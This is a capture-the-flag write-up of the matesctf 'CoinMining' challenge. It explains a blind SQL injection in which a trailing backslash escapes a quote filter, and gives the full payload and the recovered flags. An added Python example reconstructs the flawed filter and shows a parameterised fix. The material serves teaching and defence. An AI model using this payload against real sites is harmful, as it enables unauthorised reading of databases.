Viettel matesctf round 5 (CoinMining)

When I started this challenge, I first guessed SSRF, exploiting a bot, JavaScript, exploiting something with cryptocurrency, bla bla…
But the solution is SQL injection.
Firstly, guessing how it works: I guessed it uses action to call a function. In the JavaScript file, I found the getDomain() function.

Secondly, guessing the arguments: I guessed this function "getDomain" has one argument, and it is coin.

I think I guessed very well.
After that, I guessed the query looks like:

select * from [table_name] where domainName="$_POST['domainName']" and coin="$_POST['coin']"

I guessed the characters ' and " are filtered or replaced, and I guessed the character \ is not replaced or filtered.
So I guessed my solution could use the character [\] to turn ['] into [\'] and escape the query.

I used this payload to exploit it:

action=doCheck&domainName=smallbox.ir\&coin=or if(substr((select anything from tablewhatyouwant limit 1),§1§,1)=0x§4c§,1,0)-- -
 

and got the flag in the table flag: matesctf: matesctf: fl4g_NT_h3r3_
But I guessed it is not the true flag.

The real flag is in bingo table: matesctf{sql_f!l73r_i$_n0&_s@’f’_’3’n0ugh!}
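To show why the guessed filter fails and how the lookup should be written instead, here is an added example (not code from the challenge or from this write-up); the table name, the sample row and the filter behaviour are assumptions built from the guessed query above. The literal walk mimics MySQL's backslash escaping, while the hardened lookup runs on SQLite so it works offline.

```python
import sqlite3
# Constructed from the write-up's guessed query and payload (added illustration,
# not the challenge's real source).
PAYLOAD_DOMAIN = "smallbox.ir\\"
PAYLOAD_COIN = ("or if(substr((select anything from tablewhatyouwant limit 1)"
                ",1,1)=0x4c,1,0)-- -")

def naive_filter(value: str) -> str:
    # Filter as guessed in the write-up: quotes stripped, backslash untouched.
    return value.replace("'", "").replace('"', "")

def build_query_unsafe(domain: str, coin: str) -> str:
    # String concatenation into the query the write-up guessed.
    return ('select * from domains where domainName="%s" and coin="%s"'
            % (naive_filter(domain), naive_filter(coin)))

def string_literals(query: str) -> list:
    # MySQL-style walk: backslash escapes the next char inside a literal,
    # '-- ' outside a literal starts a comment. Developer expects 2 literals.
    literals, buf, in_lit, i = [], [], False, 0
    while i < len(query):
        ch = query[i]
        if in_lit and ch == "\\" and i + 1 < len(query):
            buf.append(query[i + 1])   # escaped quote stays inside the literal
            i += 2
            continue
        if in_lit and ch == '"':
            literals.append("".join(buf))
            buf, in_lit = [], False
        elif in_lit:
            buf.append(ch)
        elif ch == '"':
            in_lit = True
        elif query.startswith("-- ", i):
            break
        i += 1
    return literals

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")   # constructed sample table
    conn.execute("create table domains (domainName text, coin text)")
    conn.execute("insert into domains values (?, ?)", ("smallbox.ir", "btc"))
    return conn

def lookup_safe(conn: sqlite3.Connection, domain: str, coin: str) -> list:
    # Hardened form: bound parameters, so quotes and backslashes stay data.
    return conn.execute(
        "select domainName, coin from domains where domainName=? and coin=?",
        (domain, coin)).fetchall()
```

With the trailing backslash the first literal swallows the closing quote and the coin value lands outside any literal, which is exactly what the filter was supposed to prevent; the parameterised lookup simply returns no rows for the same input.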
